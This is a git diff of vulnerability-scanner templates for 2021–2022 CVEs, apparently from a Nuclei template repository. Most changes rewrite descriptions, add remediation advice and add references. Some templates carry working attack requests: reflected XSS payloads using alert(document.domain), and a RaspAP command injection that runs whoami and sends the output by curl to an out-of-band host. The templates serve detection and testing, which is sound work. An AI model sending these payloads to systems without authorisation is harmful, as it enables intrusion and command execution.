@@ +id: CVE-2021-3002 + +info: + name: Seo Panel 4.8.0 - Post based Reflected XSS + author: edoardottt + severity: medium + description: Seo Panel 4.8.0 allows reflected XSS via the seo/seopanel/login.php?sec=forgot email parameter. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-3002 + cwe-id: CWE-79 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-3002 + - http://www.cinquino.eu/SeoPanelReflect.htm + tags: cve,cve2021,seopanel,xss + +requests: + - raw: + - | + POST /seo/seopanel/login.php?sec=forgot HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + sec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login= + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + + - type: word + part: body + words: + - "" + - "seopanel" + condition: and \ No newline at end of file diff --git a/cves/2021/CVE-2021-33357.yaml b/cves/2021/CVE-2021-33357.yaml index 962a422282..afa271c47f 100644 --- a/cves/2021/CVE-2021-33357.yaml +++ b/cves/2021/CVE-2021-33357.yaml @@ -4,13 +4,14 @@ info: name: RaspAP <= 2.6.5 - Remote Code Execution author: pikpikcu,pdteam severity: critical + description: | + RaspAP 2.6 to 2.6.5 in the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";" which enables an unauthenticated attacker to execute arbitrary OS commands. + tags: cve,cve2021,rce,raspap,oast reference: - https://checkmarx.com/blog/chained-raspap-vulnerabilities-grant-root-level-access/ - https://gist.github.com/omriinbar/52c000c02a6992c6ce68d531195f69cf - https://nvd.nist.gov/vuln/detail/CVE-2021-33357 - https://github.com/RaspAP/raspap-webgui - description: RaspAP 2.6 to 2.6.5 in the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";" which enables an unauthenticated attacker to execute arbitrary OS commands. - tags: cve,cve2021,rce,raspap,oast classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 @@ -22,12 +23,17 @@ requests: path: - "{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20http://{{interactsh-url}}/`whoami`;" + matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" + - type: word + words: + - "DHCPEnabled" + extractors: - type: regex part: interactsh_request diff --git a/cves/2021/CVE-2021-3654.yaml b/cves/2021/CVE-2021-3654.yaml index 3fd9a96620..ff20a4a887 100644 --- a/cves/2021/CVE-2021-3654.yaml +++ b/cves/2021/CVE-2021-3654.yaml @@ -3,12 +3,17 @@ id: CVE-2021-3654 info: name: noVNC Open Redirect author: geeknik - severity: low + severity: medium description: A user-controlled input redirects noVNC users to an external website. reference: - https://seclists.org/oss-sec/2021/q3/188 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3654 tags: redirect,novnc,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-3654 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2021/CVE-2021-40868.yaml b/cves/2021/CVE-2021-40868.yaml index c688da0f0f..ffe1fcb3e5 100644 --- a/cves/2021/CVE-2021-40868.yaml +++ b/cves/2021/CVE-2021-40868.yaml @@ -1,10 +1,11 @@ id: CVE-2021-40868 info: - name: Cloudron 6.2 Cross Site Scripting + name: Cloudron 6.2 Cross-Site Scripting author: daffainfo severity: medium - description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to Reflected XSS. + description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to cross-site scripting. + remediation: Upgrade to Cloudron 6.3 or higher. reference: - https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2021-40868 @@ -35,3 +36,5 @@ requests: words: - '' part: body + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2021/CVE-2021-40870.yaml b/cves/2021/CVE-2021-40870.yaml index a7237d6d7c..f8348f548b 100644 --- a/cves/2021/CVE-2021-40870.yaml +++ b/cves/2021/CVE-2021-40870.yaml @@ -1,11 +1,12 @@ id: CVE-2021-40870 info: - name: Aviatrix Controller 6.x before 6.5-1804.1922. RCE + name: Aviatrix Controller 6.x before 6.5-1804.1922 Remote Command Execution author: pikpikcu severity: critical - description: Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal. + description: Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal. reference: + - https://docs.aviatrix.com/HowTos/UCC_Release_Notes.html#security-note-9-11-2021 - https://wearetradecraft.com/advisories/tc-2021-0002/ - https://nvd.nist.gov/vuln/detail/CVE-2021-40870 tags: cve,cve2021,rce,aviatrix @@ -41,3 +42,5 @@ requests: - "PHP Extension" - "PHP Version" condition: and + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2021/CVE-2021-40875.yaml b/cves/2021/CVE-2021-40875.yaml index 4144e75270..d018020152 100644 --- a/cves/2021/CVE-2021-40875.yaml +++ b/cves/2021/CVE-2021-40875.yaml @@ -1,16 +1,16 @@ id: CVE-2021-40875 info: - name: Gurock TestRail Application files.md5 exposure + name: Gurock TestRail Application files.md5 Exposure author: oscarintherocks severity: medium - description: Improper Access Control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths. The corresponding file paths can be tested, and in some cases, result in the disclosure of hardcoded credentials, API keys, or other sensitive data. + description: Improper access control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths which can then be tested, and in some cases result in the disclosure of hardcoded credentials, API keys, or other sensitive data. tags: cve,cve2021,exposure,gurock,testrail reference: - https://github.com/SakuraSamuraii/derailed - https://johnjhacking.com/blog/cve-2021-40875/ - https://www.gurock.com/testrail/tour/enterprise-edition - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875 + - htttps://github.com/SakuraSamuraii/derailed + - https://johnjhacking.com/blog/cve-2021-40875/ + - https://www.gurock.com/testrail/tour/enterprise-edition + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875 classification: cve-id: CVE-2021-40875 metadata: @@ -34,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2021/CVE-2021-40960.yaml b/cves/2021/CVE-2021-40960.yaml index 8702b53d29..74f5e5e2cc 100644 --- a/cves/2021/CVE-2021-40960.yaml +++ b/cves/2021/CVE-2021-40960.yaml @@ -30,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2021/CVE-2021-40978.yaml b/cves/2021/CVE-2021-40978.yaml index 81ec5d959e..d04f5ff2e6 100644 --- a/cves/2021/CVE-2021-40978.yaml +++ b/cves/2021/CVE-2021-40978.yaml @@ -1,14 +1,15 @@ id: CVE-2021-40978 info: - name: mkdocs 1.2.2 built-in dev-server allows directory traversal + name: MKdocs 1.2.2 Directory Traversal author: pikpikcu severity: high reference: + - https://github.com/mkdocs/mkdocs/pull/2604 - https://github.com/nisdn/CVE-2021-40978 - https://nvd.nist.gov/vuln/detail/CVE-2021-40978 tags: cve,cve2021,mkdocs,lfi - description: "** DISPUTED ** The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1." + description: The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. Note the vendor has disputed the vulnerability (see references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.50 @@ -31,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2021/CVE-2021-41174.yaml b/cves/2021/CVE-2021-41174.yaml index 241b7b0b94..275fb22f63 100644 --- a/cves/2021/CVE-2021-41174.yaml +++ b/cves/2021/CVE-2021-41174.yaml @@ -1,10 +1,11 @@ id: CVE-2021-41174 info: - name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering XSS + name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering Cross-Site Scripting author: pdteam severity: medium description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions. + remediation: Upgrade to 8.2.3 or higher. reference: - https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8 - https://nvd.nist.gov/vuln/detail/CVE-2021-41174 @@ -43,4 +44,6 @@ requests: - type: regex group: 1 regex: - - '"subTitle":"Grafana ([a-z0-9.]+)' \ No newline at end of file + - '"subTitle":"Grafana ([a-z0-9.]+)' + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2021/CVE-2021-41266.yaml b/cves/2021/CVE-2021-41266.yaml index 37b62119d8..9819fab0ae 100644 --- a/cves/2021/CVE-2021-41266.yaml +++ b/cves/2021/CVE-2021-41266.yaml @@ -5,7 +5,8 @@ info: author: alevsk severity: critical description: | - Minio console is a graphical user interface for the for MinIO operator. Minio itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled. All users on release v0.12.2 and before are affected and are advised to update to 0.12.3 or newer. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token. + MinIO Console is a graphical user interface for the for MinIO Operator. MinIO itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled. + remediation: "Update to v.0.12.3 or higher. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token." reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-41266 - https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36 @@ -43,4 +44,6 @@ requests: - type: word part: header words: - - "token" \ No newline at end of file + - "token" + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2021/CVE-2021-41277.yaml b/cves/2021/CVE-2021-41277.yaml index d47d490eac..77f4a745a7 100644 --- a/cves/2021/CVE-2021-41277.yaml +++ b/cves/2021/CVE-2021-41277.yaml @@ -4,7 +4,8 @@ info: name: Metabase Local File Inclusion author: 0x_Akoko severity: critical - description: Metabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. If you’re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application. + description: "Metabase is an open source data analytics platform. In affected versions a local file inclusion security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded." + remediation: "This issue is fixed in 0.40.5 and .40.5 and higher. If you are unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application." reference: - https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr - https://nvd.nist.gov/vuln/detail/CVE-2021-41277 @@ -33,4 +34,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2021/CVE-2021-41291.yaml b/cves/2021/CVE-2021-41291.yaml index b093e562b9..1b052e2df4 100644 --- a/cves/2021/CVE-2021-41291.yaml +++ b/cves/2021/CVE-2021-41291.yaml @@ -4,8 +4,9 @@ info: name: ECOA Building Automation System - Directory Traversal Content Disclosure author: gy741 severity: high - description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device + description: The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-41291 - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php - https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html tags: cve,cve2021,ecoa,lfi,traversal @@ -25,3 +26,5 @@ requests: - type: regex regex: - "root:.*:0:0:" + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2021/CVE-2021-41293.yaml b/cves/2021/CVE-2021-41293.yaml index 8a45fb3d51..ec610f0255 100644 --- a/cves/2021/CVE-2021-41293.yaml +++ b/cves/2021/CVE-2021-41293.yaml @@ -1,11 +1,12 @@ id: CVE-2021-41293 info: - name: ECOA Building Automation System - LFD + name: ECOA Building Automation System - Local File Disclosure author: 0x_Akoko severity: high - description: The BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information. + description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-41293 - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php - https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html tags: cve,cve2021,ecoa,lfi,disclosure @@ -33,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/07 diff --git a/cves/2021/CVE-2021-41349.yaml b/cves/2021/CVE-2021-41349.yaml index 225d1a6a33..44aaad9bee 100644 --- a/cves/2021/CVE-2021-41349.yaml +++ b/cves/2021/CVE-2021-41349.yaml @@ -1,12 +1,13 @@ id: CVE-2021-41349 info: - name: Pre-Auth POST Based Reflected XSS in Microsoft Exchange + name: Microsoft Exchange Server Pre-Auth POST Based Reflected Cross-Site Scripting author: rootxharsh,iamnoooob severity: medium tags: cve,cve2021,xss,microsoft,exchange - description: Microsoft Exchange Server Spoofing Vulnerability This CVE ID is unique from CVE-2021-42305. + description: Microsoft Exchange Server is vulnerable to a spoofing vulnerability. Be aware this CVE ID is unique from CVE-2021-42305. reference: + - https://www.microsoft.com/en-us/download/details.aspx?id=103643 - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-41349 - https://nvd.nist.gov/vuln/detail/CVE-2021-41349 - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41349 @@ -39,4 +40,6 @@ requests: - type: status status: - - 500 \ No newline at end of file + - 500 + +# Enhanced by mp on 2022/03/07 diff --git a/cves/2021/CVE-2021-41381.yaml b/cves/2021/CVE-2021-41381.yaml index ff9081fb62..7df1244e77 100644 --- a/cves/2021/CVE-2021-41381.yaml +++ b/cves/2021/CVE-2021-41381.yaml @@ -4,7 +4,7 @@ info: name: Payara Micro Community 5.2021.6 Directory Traversal author: pikpikcu severity: medium - description: Payara Micro Community 5.2021.6 and below allows Directory Traversal + description: Payara Micro Community 5.2021.6 and below contains a directory traversal vulnerability. reference: - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt - https://nvd.nist.gov/vuln/detail/CVE-2021-41381 @@ -28,3 +28,5 @@ requests: - "payara.security.openid.sessionScopedConfiguration=true" condition: and part: body + +# Enhanced by mp on 2022/03/07 diff --git a/cves/2021/CVE-2021-41467.yaml b/cves/2021/CVE-2021-41467.yaml index 67ba68c3a7..3bb1e8ed25 100644 --- a/cves/2021/CVE-2021-41467.yaml +++ b/cves/2021/CVE-2021-41467.yaml @@ -1,13 +1,13 @@ id: CVE-2021-41467 info: - name: JustWriting - Reflected XSS + name: JustWriting - Reflected Cross-Site Scripting author: madrobot severity: medium - description: Cross-site scripting (XSS) vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter. + description: A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter. reference: - https://github.com/hjue/JustWriting/issues/106 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41467 + - https://nvd.nist.gov/vuln/detail/CVE-2021-41467 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 @@ -36,3 +36,5 @@ requests: words: - "text/html" part: header + +# Enhanced by mp on 2022/03/07 diff --git a/cves/2021/CVE-2021-41648.yaml b/cves/2021/CVE-2021-41648.yaml index 58f28013b0..2708382c24 100644 --- a/cves/2021/CVE-2021-41648.yaml +++ b/cves/2021/CVE-2021-41648.yaml @@ -1,11 +1,14 @@ id: CVE-2021-41648 info: - name: PuneethReddyHC online-shopping-system-advanced SQL Injection action.php + name: PuneethReddyHC action.php SQL Injection author: daffainfo severity: high - description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /action.php prId parameter. Using a post request does not sanitize the user input. - reference: https://github.com/MobiusBinary/CVE-2021-41648 + description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping through the /action.php prId parameter. Using a post request does not sanitize the user input. + reference: + - https://github.com/MobiusBinary/CVE-2021-41648 + - https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system + - https://nvd.nist.gov/vuln/detail/CVE-2021-41649 tags: cve,cve2021,sqli,injection classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N @@ -38,3 +41,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/07 diff --git a/cves/2021/CVE-2021-41649.yaml b/cves/2021/CVE-2021-41649.yaml index c25aafc9c0..238c3c1178 100644 --- a/cves/2021/CVE-2021-41649.yaml +++ b/cves/2021/CVE-2021-41649.yaml @@ -1,11 +1,14 @@ id: CVE-2021-41649 info: - name: PuneethReddyHC online-shopping-system-advanced SQL Injection homeaction.php + name: PuneethReddyHC Online Shopping System homeaction.php SQL Injection author: daffainfo severity: critical - description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input. - reference: https://github.com/MobiusBinary/CVE-2021-41649 + description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping System through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input. + reference: + - https://github.com/MobiusBinary/CVE-2021-41649 + - https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system + - https://nvd.nist.gov/vuln/detail/CVE-2021-41649 tags: cve,cve2021,sqli,injection classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H @@ -37,3 +40,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/07 diff --git a/cves/2021/CVE-2021-4191.yaml b/cves/2021/CVE-2021-4191.yaml index ece7be5fbf..bccbb6ac4d 100644 --- a/cves/2021/CVE-2021-4191.yaml +++ b/cves/2021/CVE-2021-4191.yaml @@ -4,10 +4,11 @@ info: name: GitLab GraphQL API User Enumeration author: zsusac severity: medium - description: A remote, unauthenticated attacker can use this vulnerability to collect registered GitLab usernames, names, and email addresses. + description: An unauthenticated remote attacker can leverage this vulnerability to collect registered GitLab usernames, names, and email addresses. reference: - https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/ - https://thehackernews.com/2022/03/new-security-vulnerability-affects.html + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-4191 classification: cvss-metrics: CVSS:5.3/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 @@ -47,3 +48,5 @@ requests: - type: json json: - '.data.users.nodes[].username' + +# Enhanced by mp on 2022/03/07 diff --git a/cves/2021/CVE-2021-44521.yaml b/cves/2021/CVE-2021-44521.yaml index 85daf83b30..0bd987b8a1 100644 --- a/cves/2021/CVE-2021-44521.yaml +++ b/cves/2021/CVE-2021-44521.yaml @@ -8,6 +8,7 @@ info: reference: - https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/ - https://nvd.nist.gov/vuln/detail/CVE-2021-44521 + - https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/ tags: cve,cve2021,network,rce,apache,cassandra classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H @@ -54,3 +55,5 @@ network: part: raw words: - "123123" + +# Enhanced by mp on 2022/03/07 diff --git a/cves/2022/CVE-2022-0381.yaml b/cves/2022/CVE-2022-0381.yaml new file mode 100644 index 0000000000..c467531f95 --- /dev/null +++ b/cves/2022/CVE-2022-0381.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-0381 + +info: + name: WordPress Plugin Embed Swagger 1.0.0 - Reflected XSS + author: edoardottt + severity: medium + description: The Embed Swagger WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to insufficient escaping/sanitization and validation via the url parameter found in the ~/swagger-iframe.php file which allows attackers to inject arbitrary web scripts onto the page, in versions up to and including 1.0.0. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0381 + cwe-id: CWE-79 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-0381 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0381 + tags: cve,cve2022,swagger,xss,wordpress + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + + - type: word + part: body + words: + - "url: \"xss://\"-alert(document.domain)" \ No newline at end of file diff --git a/cves/2022/CVE-2022-0692.yaml b/cves/2022/CVE-2022-0692.yaml index d4817c0ab5..8afb4f3093 100644 --- a/cves/2022/CVE-2022-0692.yaml +++ b/cves/2022/CVE-2022-0692.yaml @@ -4,7 +4,7 @@ info: name: Rudloff alltube prior to 3.0.1 - Open Redirect author: 0x_Akoko severity: medium - description: Open Redirect on Rudloff/alltube in Packagist rudloff/alltube prior to 3.0.1 + description: "An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist in versions prior to 3.0.1." reference: - https://huntr.dev/bounties/4fb39400-e08b-47af-8c1f-5093c9a51203/ - https://www.cvedetails.com/cve/CVE-2022-0692 @@ -24,4 +24,6 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + +# Enhanced by mp on 2022/03/08 diff --git a/cves/2022/CVE-2022-21371.yaml b/cves/2022/CVE-2022-21371.yaml index ba91d44289..32db7db2f1 100644 --- a/cves/2022/CVE-2022-21371.yaml +++ b/cves/2022/CVE-2022-21371.yaml @@ -1,11 +1,12 @@ id: CVE-2022-21371 info: - name: Oracle WebLogic Server LFI + name: Oracle WebLogic Server Local File Inclusion author: paradessia,narluin severity: high - description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). + description: An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data. reference: + - https://www.oracle.com/security-alerts/cpujan2022.html - https://nvd.nist.gov/vuln/detail/CVE-2022-21371 - https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786 classification: @@ -45,3 +46,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/08 diff --git a/cves/2022/CVE-2022-22536.yaml b/cves/2022/CVE-2022-22536.yaml index 171684f17d..74c587f66e 100644 --- a/cves/2022/CVE-2022-22536.yaml +++ b/cves/2022/CVE-2022-22536.yaml @@ -1,16 +1,16 @@ id: CVE-2022-22536 info: - name: SAP Memory Pipes(MPI) Desynchronization + name: SAP Memory Pipes (MPI) Desynchronization author: pdteam severity: critical - description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system. + description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-22536 - https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022 - https://github.com/Onapsis/onapsis_icmad_scanner - https://blogs.sap.com/2022/02/11/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation-in-sap-netweaver-sap-content-server-and-sap-web-dispatcher/ - tags: cve,cve2022,sap,smuggling + tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.00 @@ -57,3 +57,5 @@ requests: - "HTTP/1.0 500 Internal Server Error" - "HTTP/1.0 500 Dispatching Error" condition: or + +# Enhanced by mp on 2022/03/08 diff --git a/cves/2022/CVE-2022-22947.yaml b/cves/2022/CVE-2022-22947.yaml index 58c5abcf4a..c02886515d 100644 --- a/cves/2022/CVE-2022-22947.yaml +++ b/cves/2022/CVE-2022-22947.yaml @@ -4,13 +4,16 @@ info: name: Spring Cloud Gateway Code Injection author: pdteam severity: critical - description: Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host. + description: "Applications using Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host." reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-22947 - https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/ - https://github.com/wdahlenburg/spring-gateway-demo - https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published - https://tanzu.vmware.com/security/cve-2022-22947 tags: cve,cve2022,apache,spring,vmware,actuator,oast + classification: + cve-id: CVE-2022-22947 requests: - raw: @@ -74,4 +77,6 @@ requests: - type: word part: interactsh_protocol words: - - "dns" \ No newline at end of file + - "dns" + +# Enhanced by mp on 2022/03/08 diff --git a/cves/2022/CVE-2022-23131.yaml b/cves/2022/CVE-2022-23131.yaml index 9634717d62..53811d3852 100644 --- a/cves/2022/CVE-2022-23131.yaml +++ b/cves/2022/CVE-2022-23131.yaml @@ -5,6 +5,7 @@ info: author: For3stCo1d severity: critical description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified. + remediation: Upgrade to 5.4.9rc2, 6.0.0beta1, 6.0 (plan) or higher. reference: - https://support.zabbix.com/browse/ZBX-20350 - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage @@ -39,4 +40,4 @@ requests: dsl: - "contains(tolower(all_headers), 'location: zabbix.php?action=dashboard.view')" -# Enhanced by mp on 2022/02/28 +# Enhanced by mp on 2022/03/08 diff --git 